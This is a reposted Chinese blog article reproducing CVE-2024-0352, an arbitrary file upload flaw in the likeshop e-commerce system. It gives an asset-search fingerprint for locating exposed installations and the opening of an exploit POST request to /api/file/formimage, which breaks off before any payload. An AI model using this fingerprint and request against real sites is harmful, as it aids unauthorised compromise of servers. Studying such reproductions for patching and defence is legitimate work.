当前位置: 首页 > article >正文

【漏洞复现】likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352

漏洞描述

Likeshop是Likeshop开源的一个社交商务策略的完整解决方案。Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

icon_hash="874152924" && body="/pc/"

漏洞复现

漏洞链接:https://127.0.0.1/api/file/formimage

POST /api/file/formimage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Lengt
原文地址:https://blog.csdn.net/u010025272/article/details/136019694
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.kler.cn/a/227061.html

相关文章:

  • Excel技能——使用条件格式保护数据
  • app逆向-frida-rpc详解
  • eCos flash模拟EEPROM实现NV系统
  • 如何基于文档的内容实现 AI 对话功能,以 Documate 为例
  • Debezium发布历史106
  • 怎么把几百M大小的视频做成二维码?扫码播放视频在线教程
  • 一文详解docker compose
  • [AIGC] Spring Gateway与 nacos 简介
  • 【服务器】RAID(独立磁盘冗余阵列)
  • JAVA中的访问修饰符
  • STM32--SPI通信协议(1)SPI基础知识总结
  • 大规模机器学习简介
  • 算法篇:递归、搜索与回溯算法
  • 图像处理之《基于端到端哈希生成模型的鲁棒无覆盖图像隐写》论文精读
  • 机器学习 | 如何利用集成学习提高机器学习的性能?
  • 在next.js的13.2.1版本中使用中间件,实现禁止特定ip访问网址所有页面
  • CF1033A King Escape 题解 思维
  • C语言在Visual Studio 2010环境下使用<regex.h>正则表达式函数库
  • 某种中型企业网络问题整改方案
  • Acwing---826.单链表